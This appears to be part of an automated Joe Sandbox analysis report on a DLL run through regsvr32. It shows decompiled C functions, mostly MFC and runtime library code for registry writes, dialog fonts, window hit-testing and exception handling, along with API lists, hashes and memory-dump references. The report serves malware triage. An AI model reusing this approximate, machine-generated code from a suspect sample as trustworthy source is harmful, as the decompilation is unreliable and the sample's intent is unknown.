                                                                                                                • lstrlenA.KERNEL32(?), ref: 100274DB
                                                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 100274F0
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100274FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Valuelstrlen$CloseCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 306239685-0
                                                                                                                • Opcode ID: b98d6f689e483a70c17520ea159640c3281620c63b2fce4f4f9897c40c2de14e
                                                                                                                • Instruction ID: 1a083539fbb7e3cf4d2df25f18eb296ca7e546c33c8e0ee3a617baa585e2e8d4
                                                                                                                • Opcode Fuzzy Hash: b98d6f689e483a70c17520ea159640c3281620c63b2fce4f4f9897c40c2de14e
                                                                                                                • Instruction Fuzzy Hash: 03012832100129BFEF029FA0EC48FDA3B69FB09391F118050FE1AD9060D7B18AA0DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10021C73 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 38%
                                                                                                                			E10021C73(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}






                                                                                                                0x10021c82
                                                                                                                0x10021c8e
                                                                                                                0x10021c90
                                                                                                                0x10021cd3
                                                                                                                0x10021cd3
                                                                                                                0x10021cd5
                                                                                                                0x10021cd9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10021c9f
                                                                                                                0x10021cb6
                                                                                                                0x10021cbc
                                                                                                                0x10021cce
                                                                                                                0x00000000
                                                                                                                0x10021ce1
                                                                                                                0x10021cce
                                                                                                                0x10021cd0
                                                                                                                0x10021cd2
                                                                                                                0x10021cd2
                                                                                                                0x10021cde

                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 10021C82
                                                                                                                • GetDlgCtrlID.USER32 ref: 10021C96
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10021CA4
                                                                                                                • GetWindowRect.USER32 ref: 10021CB6
                                                                                                                • PtInRect.USER32(?,?,?), ref: 10021CC6
                                                                                                                • GetWindow.USER32(?,00000005), ref: 10021CD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1315500227-0
                                                                                                                • Opcode ID: 1d9de721b9a26bd69ca62d5b2478726604d9982e888f588691e81107ad8f01a7
                                                                                                                • Instruction ID: 056b4d92a6fa20764070ee86cb15b7d4404cee6e30cb9152d70db7d47511102d
                                                                                                                • Opcode Fuzzy Hash: 1d9de721b9a26bd69ca62d5b2478726604d9982e888f588691e81107ad8f01a7
                                                                                                                • Instruction Fuzzy Hash: 6301A23D140525EBEB119F55AD48FEE377CEF86390F540010F902D5150D730D9129B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002A471 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 126stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1002A471(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				void* __ebp;
				signed int _t54;
				void* _t66;
				short* _t70;
				signed int _t72;
				signed int _t81;
				signed int* _t83;
				short* _t84;
				void* _t91;
				signed int* _t98;
				signed int _t99;
				void** _t100;
				intOrPtr _t102;
				signed int _t104;
				signed int _t106;
				void* _t107;

				_t101 = __esi;
				_t97 = __edx;
				_t82 = __ebx;
				_t54 =  *0x100b9e70; // 0xbb35530
				_v8 = _t54 ^ _t106;
				_t100 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E1002A0B5(_t83);
					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t102;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t66 = 0;
					} else {
						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t97;
						if(_t97 < _t102) {
							goto L15;
						} else {
							_t70 = E1002A121(_t83);
							_t91 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t81 = E100483AC(_t84 + _t102);
								_t97 = _v76;
								_t91 = _t102 + 2 + _t81 * 2;
							}
							_t33 = _t97 + 3; // 0x3
							_t98 = _v84;
							_t36 = _t84 + 3; // 0x10002
							_t72 = _t91 + _t36 & 0xfffffffc;
							_t104 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t99 =  *(_t98 + 8) & 0x0000ffff;
							} else {
								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t91 || _t99 <= 0) {
								L17:
								 *_t84 = _a8;
								_t97 =  &_v72;
								E100224F1(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t100[1] = _t100[1] + _t104 - _v80;
								GlobalUnlock( *_t100);
								_t100[2] = _t100[2] & 0x00000000;
								_t66 = 1;
							} else {
								_t97 = _t100[1];
								_t95 = _t97 - _t72 + _v84;
								if(_t97 - _t72 + _v84 <= _t97) {
									E100224F1(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
									_t107 = _t107 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t101);
					_pop(_t82);
				} else {
					_t66 = 0;
				}
				return E1004763E(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
			}



























                                                                                                                0x1002a471
                                                                                                                0x1002a471
                                                                                                                0x1002a471
                                                                                                                0x1002a477
                                                                                                                0x1002a47e
                                                                                                                0x1002a485
                                                                                                                0x1002a48b
                                                                                                                0x1002a48e
                                                                                                                0x1002a497
                                                                                                                0x1002a498
                                                                                                                0x1002a4a1
                                                                                                                0x1002a4af
                                                                                                                0x1002a4b2
                                                                                                                0x1002a4ba
                                                                                                                0x1002a4d0
                                                                                                                0x1002a4d2
                                                                                                                0x1002a4d5
                                                                                                                0x1002a4dd
                                                                                                                0x1002a4d7
                                                                                                                0x1002a4d7
                                                                                                                0x1002a4d7
                                                                                                                0x1002a4ec
                                                                                                                0x1002a56a
                                                                                                                0x1002a56a
                                                                                                                0x1002a4ee
                                                                                                                0x1002a503
                                                                                                                0x1002a508
                                                                                                                0x1002a50b
                                                                                                                0x00000000
                                                                                                                0x1002a50d
                                                                                                                0x1002a50e
                                                                                                                0x1002a514
                                                                                                                0x1002a519
                                                                                                                0x1002a51b
                                                                                                                0x1002a521
                                                                                                                0x1002a526
                                                                                                                0x1002a52a
                                                                                                                0x1002a52a
                                                                                                                0x1002a52e
                                                                                                                0x1002a532
                                                                                                                0x1002a535
                                                                                                                0x1002a539
                                                                                                                0x1002a53c
                                                                                                                0x1002a543
                                                                                                                0x1002a546
                                                                                                                0x1002a54e
                                                                                                                0x1002a548
                                                                                                                0x1002a548
                                                                                                                0x1002a548
                                                                                                                0x1002a555
                                                                                                                0x1002a57a
                                                                                                                0x1002a581
                                                                                                                0x1002a58a
                                                                                                                0x1002a592
                                                                                                                0x1002a59f
                                                                                                                0x1002a5a2
                                                                                                                0x1002a5a8
                                                                                                                0x1002a5ae
                                                                                                                0x1002a55c
                                                                                                                0x1002a55c
                                                                                                                0x1002a563
                                                                                                                0x1002a568
                                                                                                                0x1002a572
                                                                                                                0x1002a577
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002a568
                                                                                                                0x1002a555
                                                                                                                0x1002a50b
                                                                                                                0x1002a5af
                                                                                                                0x1002a5b0
                                                                                                                0x1002a490
                                                                                                                0x1002a490
                                                                                                                0x1002a490
                                                                                                                0x1002a5bd

                                                                                                                APIs
                                                                                                                • GlobalLock.KERNEL32 ref: 1002A49B
                                                                                                                • lstrlenA.KERNEL32(?), ref: 1002A4E3
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002A4FD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                • String ID: System
                                                                                                                • API String ID: 1529587224-3470857405
                                                                                                                • Opcode ID: add4daa675d314f432678064272db609e7b0bf7928c7362a76e1f5644706ad66
                                                                                                                • Instruction ID: a362d802a26bc59b02e68d4c8ec6b0a0d691d4ff30d83771d59177cbbb1e45ed
                                                                                                                • Opcode Fuzzy Hash: add4daa675d314f432678064272db609e7b0bf7928c7362a76e1f5644706ad66
                                                                                                                • Instruction Fuzzy Hash: 1341F471D00225DFDB04DFA4CC85A9EBBB5FF05310F648129E802EB285EB74A985CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10050D2D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10050D2D(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t28;
				void* _t29;
				signed int* _t31;
				void* _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				signed int* _t38;
				signed int _t41;
				signed int _t49;
				signed int _t52;
				void* _t53;
				signed int _t55;
				signed int _t57;
				signed int _t59;
				void* _t61;
				void* _t62;

				_t28 = _a4;
				_t62 = _t61 - 0x10;
				if(_t28 != 0) {
					_t49 = _a12;
					_t59 =  *_t28;
					_t55 = _a8;
					__eflags = _t55;
					if(_t55 == 0) {
						L4:
						_t29 =  *_t59;
						__eflags = _t29 - 0xe0434f4d;
						if(_t29 == 0xe0434f4d) {
							L21:
							__eflags = _t29 - 0xe06d7363;
							if(__eflags != 0) {
								L29:
								_t31 = E100516CA(_t53, _t55, __eflags) + 0x90;
								 *_t31 =  *_t31 + 1;
								__eflags =  *_t31;
								goto L30;
							} else {
								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
								if(__eflags != 0) {
									goto L29;
								} else {
									_t34 =  *((intOrPtr*)(_t59 + 0x14));
									__eflags = _t34 - 0x19930520;
									if(_t34 == 0x19930520) {
										L26:
										__eflags =  *(_t59 + 0x1c);
										if(__eflags != 0) {
											goto L29;
										} else {
											__eflags =  *(E100516CA(_t53, _t55, __eflags) + 0x88);
											if(__eflags != 0) {
												goto L29;
											} else {
												goto L28;
											}
										}
									} else {
										__eflags = _t34 - 0x19930521;
										if(_t34 == 0x19930521) {
											goto L26;
										} else {
											__eflags = _t34 - 0x19930522;
											if(__eflags != 0) {
												goto L29;
											} else {
												goto L26;
											}
										}
									}
								}
							}
						} else {
							__eflags = _t49 & 0x00000040;
							if((_t49 & 0x00000040) == 0) {
								goto L21;
							} else {
								goto L6;
							}
						}
					} else {
						__eflags =  *((char*)(_t55 + 8));
						if( *((char*)(_t55 + 8)) != 0) {
							L6:
							__eflags =  *_t59 - 0xe06d7363;
							if( *_t59 != 0xe06d7363) {
								L28:
								_t33 = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t59 + 0x10)) - 3;
								if( *((intOrPtr*)(_t59 + 0x10)) != 3) {
									goto L28;
								} else {
									_t36 =  *((intOrPtr*)(_t59 + 0x14));
									__eflags = _t36 - 0x19930520;
									if(_t36 == 0x19930520) {
										L11:
										__eflags =  *(_t59 + 0x1c);
										if(__eflags != 0) {
											L14:
											_t38 =  *( *(_t59 + 0x1c) + 0xc);
											_v16 = _t55;
											_t57 =  *_t38;
											_v20 = _t49 | 0x80000000;
											_t52 =  &(_t38[1]);
											while(1) {
												__eflags = _t57;
												if(_t57 <= 0) {
													break;
												}
												_a4 =  *_t52;
												_t41 = E100502AB( &_v20,  *_t52,  *(_t59 + 0x1c));
												_t62 = _t62 + 0xc;
												__eflags = _t41;
												if(__eflags != 0) {
													 *((intOrPtr*)(E100516CA(_t53, _t57, __eflags) + 0x90)) =  *((intOrPtr*)(E100516CA(_t53, _t57, __eflags) + 0x90)) + 1;
													__eflags = _a16;
													if(__eflags != 0) {
														_push(_a4);
														_push( &_v20);
														_push(_a16);
														_push(_t59);
														E10050C9C(_t52, _t57, _t59, __eflags);
													}
													L30:
													_t33 = 1;
													__eflags = 1;
												} else {
													_t57 = _t57 - 1;
													_t52 = _t52 + 4;
													__eflags = _t52;
													continue;
												}
												goto L31;
											}
											goto L28;
										} else {
											__eflags =  *(E100516CA(_t53, _t55, __eflags) + 0x88);
											if(__eflags == 0) {
												goto L28;
											} else {
												_t59 =  *(E100516CA(_t53, _t55, __eflags) + 0x88);
												goto L14;
											}
										}
									} else {
										__eflags = _t36 - 0x19930521;
										if(_t36 == 0x19930521) {
											goto L11;
										} else {
											__eflags = _t36 - 0x19930522;
											if(_t36 != 0x19930522) {
												goto L28;
											} else {
												goto L11;
											}
										}
									}
								}
							}
						} else {
							goto L4;
						}
					}
					L31:
					return _t33;
				} else {
					return _t28;
				}
			}

























                                                                                                                0x10050d30
                                                                                                                0x10050d33
                                                                                                                0x10050d38
                                                                                                                0x10050d3d
                                                                                                                0x10050d41
                                                                                                                0x10050d44
                                                                                                                0x10050d47
                                                                                                                0x10050d49
                                                                                                                0x10050d51
                                                                                                                0x10050d51
                                                                                                                0x10050d53
                                                                                                                0x10050d58
                                                                                                                0x10050e1f
                                                                                                                0x10050e1f
                                                                                                                0x10050e24
                                                                                                                0x10050e5c
                                                                                                                0x10050e61
                                                                                                                0x10050e66
                                                                                                                0x10050e66
                                                                                                                0x00000000
                                                                                                                0x10050e26
                                                                                                                0x10050e26
                                                                                                                0x10050e2a
                                                                                                                0x00000000
                                                                                                                0x10050e2c
                                                                                                                0x10050e2c
                                                                                                                0x10050e2f
                                                                                                                0x10050e34
                                                                                                                0x10050e44
                                                                                                                0x10050e44
                                                                                                                0x10050e48
                                                                                                                0x00000000
                                                                                                                0x10050e4a
                                                                                                                0x10050e4f
                                                                                                                0x10050e56
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10050e56
                                                                                                                0x10050e36
                                                                                                                0x10050e36
                                                                                                                0x10050e3b
                                                                                                                0x00000000
                                                                                                                0x10050e3d
                                                                                                                0x10050e3d
                                                                                                                0x10050e42
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10050e42
                                                                                                                0x10050e3b
                                                                                                                0x10050e34
                                                                                                                0x10050e2a
                                                                                                                0x10050d5e
                                                                                                                0x10050d5e
                                                                                                                0x10050d61
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10050d61
                                                                                                                0x10050d4b
                                                                                                                0x10050d4b
                                                                                                                0x10050d4f
                                                                                                                0x10050d67
                                                                                                                0x10050d67
                                                                                                                0x10050d6d
                                                                                                                0x10050e58
                                                                                                                0x10050e58
                                                                                                                0x10050d73
                                                                                                                0x10050d73
                                                                                                                0x10050d77
                                                                                                                0x00000000
                                                                                                                0x10050d7d
                                                                                                                0x10050d7d
                                                                                                                0x10050d80
                                                                                                                0x10050d85
                                                                                                                0x10050d99
                                                                                                                0x10050d99
                                                                                                                0x10050d9d
                                                                                                                0x10050dbc
                                                                                                                0x10050dbf
                                                                                                                0x10050dc8
                                                                                                                0x10050dcb
                                                                                                                0x10050dcd
                                                                                                                0x10050dd0
                                                                                                                0x10050df2
                                                                                                                0x10050df2
                                                                                                                0x10050df4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10050dda
                                                                                                                0x10050de2
                                                                                                                0x10050de7
                                                                                                                0x10050dea
                                                                                                                0x10050dec
                                                                                                                0x10050e02
                                                                                                                0x10050e04
                                                                                                                0x10050e08
                                                                                                                0x10050e0a
                                                                                                                0x10050e10
                                                                                                                0x10050e11
                                                                                                                0x10050e14
                                                                                                                0x10050e15
                                                                                                                0x10050e1a
                                                                                                                0x10050e68
                                                                                                                0x10050e6a
                                                                                                                0x10050e6a
                                                                                                                0x10050dee
                                                                                                                0x10050dee
                                                                                                                0x10050def
                                                                                                                0x10050def
                                                                                                                0x00000000
                                                                                                                0x10050def
                                                                                                                0x00000000
                                                                                                                0x10050dec
                                                                                                                0x00000000
                                                                                                                0x10050d9f
                                                                                                                0x10050da4
                                                                                                                0x10050dab
                                                                                                                0x00000000
                                                                                                                0x10050db1
                                                                                                                0x10050db6
                                                                                                                0x00000000
                                                                                                                0x10050db6
                                                                                                                0x10050dab
                                                                                                                0x10050d87
                                                                                                                0x10050d87
                                                                                                                0x10050d8c
                                                                                                                0x00000000
                                                                                                                0x10050d8e
                                                                                                                0x10050d8e
                                                                                                                0x10050d93
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10050d93
                                                                                                                0x10050d8c
                                                                                                                0x10050d85
                                                                                                                0x10050d77
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10050d4f
                                                                                                                0x10050e6b
                                                                                                                0x10050e6f
                                                                                                                0x10050d3b
                                                                                                                0x10050d3b
                                                                                                                0x10050d3b

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: MOC$csm$csm
                                                                                                                • API String ID: 0-2232927589
                                                                                                                • Opcode ID: 01d0c4e04deef3b23751debaca89c328d60a6b307dfcb4c8aeed1ba256e0b420
                                                                                                                • Instruction ID: c785563120ba7acf1231274dc8805c591b12c91c46697228b9ee6d8b3a224c61
                                                                                                                • Opcode Fuzzy Hash: 01d0c4e04deef3b23751debaca89c328d60a6b307dfcb4c8aeed1ba256e0b420
                                                                                                                • Instruction Fuzzy Hash: DC314D369002469FDB60CEA4C84279D73F8EF00299F654D59F88597251E770ED4CCBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002B4A4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98libraryloaderCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1002B4A4(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, CHAR* __esi, void* __eflags) {
				intOrPtr _t33;
				struct HINSTANCE__* _t44;
				signed int _t45;
				_Unknown_base(*)()* _t46;
				intOrPtr _t53;
				intOrPtr _t58;
				void* _t74;
				void* _t77;

				_t76 = __esi;
				_t75 = __edi;
				_t74 = __edx;
				_push(0x20);
				E100476B6(0x100900e4, __ebx, __edi, __esi);
				_t58 = __ecx;
				 *((intOrPtr*)(_t77 - 0x2c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1009ddfc;
				_t33 =  *((intOrPtr*)(__ecx + 0x44));
				 *(_t77 - 4) = 2;
				 *((intOrPtr*)(_t77 - 0x24)) = _t33;
				if(_t33 == 0) {
					L7:
					if( *((intOrPtr*)(_t58 + 0x4c)) == 0) {
						L12:
						E100213E6(_t58, _t58 + 0x24, _t75);
						L10020F7B(_t58 + 0x64);
						 *(_t77 - 0x20) =  *(_t77 - 0x20) & 0x00000000;
						_push(_t77 - 0x20);
						if(E10021182(_t58, 0x100a594c) >= 0) {
							_t76 = "mfcm80.dll";
							_t75 = _t77 - 0x1c;
							asm("movsd");
							asm("movsd");
							asm("movsw");
							asm("movsb");
							_t44 = GetModuleHandleA(_t77 - 0x1c);
							if(_t44 != 0) {
								_t46 = GetProcAddress(_t44, "MFCM80ReleaseManagedReferences");
								if(_t46 != 0) {
									 *_t46( *(_t77 - 0x20));
								}
							}
							_t45 =  *(_t77 - 0x20);
							_t38 =  *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						 *(_t77 - 4) = 1;
						E100222E4(_t38, _t58, _t58 + 0x40, _t74);
						 *(_t77 - 4) = 0;
						E100215BB(_t58, _t58 + 0x24, _t74, _t75);
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						E10010C62(_t58);
						return E10047739(_t58, _t75, _t76);
					}
					_t75 = _t58 + 0x40;
					do {
						_t76 = E100221E9(_t58, _t75, _t75, _t76);
						_t85 = _t76;
						if(_t76 != 0) {
							E1002AB59(_t76);
							_push(_t76);
							E10009F3F(_t58, _t75, _t76, _t85);
						}
					} while ( *((intOrPtr*)(_t58 + 0x4c)) != 0);
					goto L12;
				} else {
					_t75 = __ecx + 0x40;
					do {
						 *((intOrPtr*)(_t77 - 0x28)) = _t33;
						_t76 =  *((intOrPtr*)(E10012115(_t77 - 0x24)));
						if(_t76 != 0) {
							_t53 =  *((intOrPtr*)(_t76 + 4));
							if(_t53 != 0) {
								_t82 =  *((intOrPtr*)(_t53 + 0x90));
								if( *((intOrPtr*)(_t53 + 0x90)) == 0) {
									E1002223E(_t75, _t76,  *((intOrPtr*)(_t77 - 0x28)));
									E1002AB59(_t76);
									_push(_t76);
									E10009F3F(_t58, _t75, _t76, _t82);
								}
							}
						}
						_t33 =  *((intOrPtr*)(_t77 - 0x24));
					} while (_t33 != 0);
					goto L7;
				}
			}











                                                                                                                0x1002b4a4
                                                                                                                0x1002b4a4
                                                                                                                0x1002b4a4
                                                                                                                0x1002b4a4
                                                                                                                0x1002b4ab
                                                                                                                0x1002b4b0
                                                                                                                0x1002b4b2
                                                                                                                0x1002b4b5
                                                                                                                0x1002b4bb
                                                                                                                0x1002b4c0
                                                                                                                0x1002b4c7
                                                                                                                0x1002b4ca
                                                                                                                0x1002b512
                                                                                                                0x1002b516
                                                                                                                0x1002b53c
                                                                                                                0x1002b53f
                                                                                                                0x1002b548
                                                                                                                0x1002b54d
                                                                                                                0x1002b554
                                                                                                                0x1002b563
                                                                                                                0x1002b565
                                                                                                                0x1002b56a
                                                                                                                0x1002b56d
                                                                                                                0x1002b56e
                                                                                                                0x1002b56f
                                                                                                                0x1002b575
                                                                                                                0x1002b576
                                                                                                                0x1002b57e
                                                                                                                0x1002b586
                                                                                                                0x1002b58e
                                                                                                                0x1002b593
                                                                                                                0x1002b595
                                                                                                                0x1002b58e
                                                                                                                0x1002b596
                                                                                                                0x1002b59c
                                                                                                                0x1002b59c
                                                                                                                0x1002b5a2
                                                                                                                0x1002b5a6
                                                                                                                0x1002b5ae
                                                                                                                0x1002b5b2
                                                                                                                0x1002b5b7
                                                                                                                0x1002b5bd
                                                                                                                0x1002b5c7
                                                                                                                0x1002b5c7
                                                                                                                0x1002b518
                                                                                                                0x1002b51b
                                                                                                                0x1002b522
                                                                                                                0x1002b524
                                                                                                                0x1002b526
                                                                                                                0x1002b52a
                                                                                                                0x1002b52f
                                                                                                                0x1002b530
                                                                                                                0x1002b535
                                                                                                                0x1002b536
                                                                                                                0x00000000
                                                                                                                0x1002b4cc
                                                                                                                0x1002b4cc
                                                                                                                0x1002b4cf
                                                                                                                0x1002b4cf
